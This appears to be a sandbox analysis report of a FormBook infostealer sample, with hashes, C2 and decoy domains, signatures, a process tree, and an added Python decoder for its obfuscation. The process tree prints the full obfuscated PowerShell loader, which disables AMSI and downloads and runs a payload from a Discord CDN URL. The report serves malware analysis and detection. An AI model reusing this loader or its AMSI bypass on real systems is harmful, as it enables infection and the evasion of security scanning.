Analysis
- max time kernel: 150s
- max time network: 125s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 26-07-2021 17:11
Static task: static1
Behavioral task: behavioral1
- Sample: 51c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541.64.exe.bin.exe
- Resource: win7v20210408
General
- Target: 51c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541.64.exe.bin.exe
- Size: 65KB
- MD5: 06daa4f472383226392964c70e34c376
- SHA1: b47a3554b0bf7250caa0f84090fb387cb332f31b
- SHA256: 51c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541
- SHA512: 9f220bc3f4c097d582f2958e57255e862f1b67191c6409ea0199a1c9ce3bd57830f7d9cd86c38925b7c61d744a77cbd51d2b59ffee9f66d57e0ee2a4ab654dee
Malware Config
Extracted
- Family: formbook
- Version: 4.1
- C2 URL: http://www.howmucharemyrarecoinsworth.com/jn7g/
- Decoy domains (the FormBook config carries these alongside the real C2; traffic to them is cover, not command and control):
  mojketering.com
  signinsimple.com
  theartclouds.com
  xmartmanagement.com
  akademisantri.com
  knitsu.com
  funeralhomeswarrensburgil.com
  formatohd.xyz
  ortetiles.com
  myeduhubs.com
  twinpiques.com
  itpaystobefashionable.com
  3drinkminimum.com
  wanpoo1.com
  crystalclearlifecoachingcc.com
  dronerealestate.net
  langers.email
  konstela.com
  enteratecondanielvelasquez.com
  graceinhomeschoolchaos.com
  wanxin1.com
  comma-la.store
  egedenportreler.com
  foslandlawfirm.site
  oarange.xyz
  mellatt.xyz
  helgrooup.com
  cartucce-toner.com
  lalucacreative.com
  salivasolve.com
  hughesconsulting.agency
  sundowntownthemovie.com
  sacredsexacademy.com
  riseandgrindcle.com
  wildflowervtg.com
  bienchezvous.net
  alterduosrl.online
  3jsgj.com
  cleanwarrenton.com
  redpenguy.com
  undiscri.club
  austincitytexas.com
  terrenutra.com
  lvbaoshan.com
  tallercolombo.com
  applicableturnout.club
  arboledacoaching.com
  stevewinchmusic.com
  benandsara.com
  denlasvegas.com
  pragocoptertour.com
  cyvape.com
  alicehollywood.com
  jokysun.com
  856380176.xyz
  umamipost.com
  cod16.com
  negociosconvictortorres.com
  wabizo.net
  46thpresidentofusa.com
  timer-pooh.com
  trademarkrates.com
  transemmiconductor.com
  groovepafes.com
Signatures
- suricata: ET MALWARE FormBook CnC Checkin (GET)
- Formbook Payload (3 IoCs)
  resource                                                                      yara_rule
  behavioral2/memory/3904-160-0x0000000000400000-0x000000000042E000-memory.dmp  formbook
  behavioral2/memory/3904-161-0x000000000041EBD0-mapping.dmp                    formbook
  behavioral2/memory/2508-171-0x0000000002A70000-0x0000000002A9E000-memory.dmp  formbook
- Blocklisted process makes network request (3 IoCs)
  flow  pid  process
  10    580  Powershell.exe
  12    580  Powershell.exe
  14    580  Powershell.exe
- Suspicious use of SetThreadContext (3 IoCs)
  description                          pid   process         target process
  PID 580 set thread context of 3904   580   Powershell.exe  calc.exe
  PID 3904 set thread context of 2504  3904  calc.exe        Explorer.EXE
  PID 2508 set thread context of 2504  2508  help.exe        Explorer.EXE
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid   process         entries
  580   Powershell.exe  8
  3904  calc.exe        4
  2508  help.exe        52 (the remaining entries)
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid   process
  2504  Explorer.EXE
- Suspicious behavior: MapViewOfSection (5 IoCs)
  pid   process   entries
  3904  calc.exe  3
  2508  help.exe  2
- Suspicious use of AdjustPrivilegeToken (51 IoCs, in the order recorded)
  pid   process         tokens
  580   Powershell.exe  SeDebugPrivilege, then the following sequence twice over: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  3904  calc.exe        SeDebugPrivilege
  2504  Explorer.EXE    SeShutdownPrivilege, SeCreatePagefilePrivilege
  2508  help.exe        SeDebugPrivilege
  2504  Explorer.EXE    SeShutdownPrivilege, SeCreatePagefilePrivilege, SeShutdownPrivilege, SeCreatePagefilePrivilege
- Suspicious use of WriteProcessMemory (14 IoCs)
  description                        pid   process                                                                           target process  entries
  PID 3980 wrote to memory of 580    3980  51c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541.64.exe.bin.exe  Powershell.exe  2
  PID 580 wrote to memory of 3904    580   Powershell.exe                                                                    calc.exe        6
  PID 2504 wrote to memory of 2508   2504  Explorer.EXE                                                                      help.exe        3
  PID 2508 wrote to memory of 2652   2508  help.exe                                                                          cmd.exe         3
Processes (indented by parent/child depth; the command line follows each image path)
C:\Windows\Explorer.EXE
  "C:\Windows\Explorer.EXE"
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\Temp\51c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541.64.exe.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\51c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541.64.exe.bin.exe"
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$76545677866555677886556778657=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,56,53,56,55,57,51,51,50,50,48,56,55,55,49,48,55,53,51,47,56,54,51,56,57,56,49,51,54,56,53,52,48,48,51,55,50,50,47,109,101,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($76545677866555677886556778657)|I`E`X
      - Blocklisted process makes network request
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\WINDOWS\syswow64\calc.exe
        "{path}"
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\help.exe
    "C:\Windows\SysWOW64\help.exe"
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe
      /c del "C:\WINDOWS\syswow64\calc.exe"
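The Powershell.exe command line above hides its strings in two layers so that the literals AmsiUtils and amsiInitFailed never appear in the command line where AMSI and EDR string signatures look for them: a string of two-digit numbers to which 53 is added and cast to [char] (the $835FFE1926 variable), and a second stage stored as a decimal byte array that is ASCII-decoded and piped to I`E`X. Below is an added Python decoder for both layers; it is not part of the sandbox report or the sample. The function names are mine, and CMDLINE_EXCERPT is constructed from the real digit string and the real opening of the byte array (the array is truncated for length), so it runs offline on what is actually on this page.

```python
"""Decoder for the obfuscation layers in the captured Powershell.exe command line.
Added example; not from the sandbox report or the sample. Standard library only."""
import re

# Digit string from the command line above ($835FFE1926). Each two-digit pair
# plus 53 is one character.
AMSI_FIELD_DIGITS = "4456625220575263174452554847"

# Opening of the byte array above ($7654...), copied verbatim and truncated here
# for length. The full array is on the page and decodes the same way.
STAGE2_PREFIX_NUMBERS = (
    "91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,"
    "40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,"
    "109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,"
    "39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,"
    "65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,"
    "72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41"
)

# Constructed excerpt in the shape of the real command line (variable names kept).
CMDLINE_EXCERPT = (
    "$835FFE1926='" + AMSI_FIELD_DIGITS + "';"
    "$76545677866555677886556778657=@(" + STAGE2_PREFIX_NUMBERS + ");"
    "[System.Text.Encoding]::ASCII.GetString($76545677866555677886556778657)|I`E`X"
)


def decode_digit_pairs(digits: str, offset: int = 53) -> str:
    """Layer 1: 0..N|%{[char][int](53+$s.substring($_*2,2))} -replace ' '."""
    return "".join(chr(offset + int(digits[i:i + 2])) for i in range(0, len(digits), 2))


def decode_byte_array(ps_text: str) -> str:
    """Layer 2: locate the first @(n,n,...) literal and ASCII-decode it."""
    m = re.search(r"@\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", ps_text)
    if not m:
        raise ValueError("no @(...) byte array found")
    return bytes(int(n) for n in m.group(1).split(",")).decode("ascii")


# [cHAr](98-33), [CHaR]([BYte]0x69), [cHaR](9680/88): case-insensitive, one operator.
_CHAR_EXPR = re.compile(
    r"\[char\]\s*\(\s*(?:\[byte\]\s*)?(0x[0-9a-f]+|\d+\s*(?:[-+*/]\s*\d+)?)\s*\)",
    re.IGNORECASE,
)
_CONCAT = re.compile(r"'\+'")              # 'ab'+'cd'  -> 'abcd'
_SUBEXPR = re.compile(r"\$\('([^']*)'\)")  # $('abcd')  -> 'abcd'


def _int_expr(expr: str) -> int:
    """Evaluate the small arithmetic the script uses, without eval()."""
    expr = expr.replace(" ", "")
    if expr.lower().startswith("0x"):
        return int(expr, 16)
    m = re.fullmatch(r"(\d+)([-+*/])(\d+)", expr)
    if not m:
        return int(expr)
    a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
    return {"+": a + b, "-": a - b, "*": a * b, "/": a // b}[op]


def fold_char_exprs(ps_text: str) -> str:
    """Turn [char] expressions into quoted literals, then merge the '+' joins
    and $( ) wrappers until the text stops changing."""
    out = _CHAR_EXPR.sub(lambda m: "'" + chr(_int_expr(m.group(1))) + "'", ps_text)
    while True:
        new = _SUBEXPR.sub(r"'\1'", _CONCAT.sub("", out))
        if new == out:
            return out
        out = new


def triage(cmdline: str) -> dict:
    """Decode both layers of a command line in this shape and pull out the
    strings an analyst wants first: the AMSI field, the stage-2 text, any URLs."""
    m = re.search(r"=\s*'((?:\d\d)+)'\s*;", cmdline)
    stage2 = fold_char_exprs(decode_byte_array(cmdline))
    return {
        "amsi_field": decode_digit_pairs(m.group(1)) if m else None,
        "stage2": stage2,
        "urls": re.findall(r"https?://[^\s'\"]+", stage2),
    }


if __name__ == "__main__":
    result = triage(CMDLINE_EXCERPT)
    print("AMSI field:", result["amsi_field"])
    print("stage 2   :", result["stage2"])
```

On the excerpt, triage() recovers the field name amsiInitFailed and the de-obfuscated second-stage opening [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'). Fed the full array from the command line above, the same decode_byte_array() and fold_char_exprs() show that the second stage repeats the amsiInitFailed bypass with the [char]-arithmetic spelling, loops on test-connection -comp google.com until the sandbox has network, forces SecurityProtocolType 3072 (TLS 1.2), fetches https://cdn.discordapp.com/attachments/858793322087710753/863898136854003722/me.jpg through a Microsoft.XMLHTTP COM object, base64-decodes the response body and pipes it to I`E`X; the resulting payload is what hollows the SysWOW64 calc.exe seen next in the tree. Setting SetValue($null,$true) on that field is what makes every later AMSI scan in the process return "initialization failed", so nothing after it is scanned; PowerShell script block logging (event 4104) still records the decoded stage, which is the log to pull when reproducing this chain.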
Downloads (memory dumps, in the order listed)
- memory/580-121-0x0000022A255E0000-0x0000022A255E2000-memory.dmp   Filesize 8KB
- memory/580-120-0x0000022A0D080000-0x0000022A0D081000-memory.dmp   Filesize 4KB
- memory/580-122-0x0000022A255E3000-0x0000022A255E5000-memory.dmp   Filesize 8KB
- memory/580-125-0x0000022A26080000-0x0000022A26081000-memory.dmp   Filesize 4KB
- memory/580-142-0x0000022A255E6000-0x0000022A255E8000-memory.dmp   Filesize 8KB
- memory/580-158-0x0000022A265A0000-0x0000022A265FA000-memory.dmp   Filesize 360KB
- memory/580-114-0x0000000000000000-mapping.dmp
- memory/580-162-0x0000022A255E8000-0x0000022A255E9000-memory.dmp   Filesize 4KB
- memory/2504-167-0x0000000004F20000-0x0000000005085000-memory.dmp  Filesize 1.4MB
- memory/2504-175-0x00000000063A0000-0x00000000064EE000-memory.dmp  Filesize 1.3MB
- memory/2508-170-0x0000000000370000-0x0000000000377000-memory.dmp  Filesize 28KB
- memory/2508-169-0x0000000000000000-mapping.dmp
- memory/2508-171-0x0000000002A70000-0x0000000002A9E000-memory.dmp  Filesize 184KB
- memory/2508-173-0x0000000002E50000-0x0000000003170000-memory.dmp  Filesize 3.1MB
- memory/2508-174-0x0000000002D40000-0x0000000002DD3000-memory.dmp  Filesize 588KB
- memory/2652-172-0x0000000000000000-mapping.dmp
- memory/3904-166-0x00000000028D0000-0x0000000002A1A000-memory.dmp  Filesize 1.3MB
- memory/3904-165-0x0000000003010000-0x0000000003330000-memory.dmp  Filesize 3.1MB
- memory/3904-161-0x000000000041EBD0-mapping.dmp
- memory/3904-160-0x0000000000400000-0x000000000042E000-memory.dmp  Filesize 184KB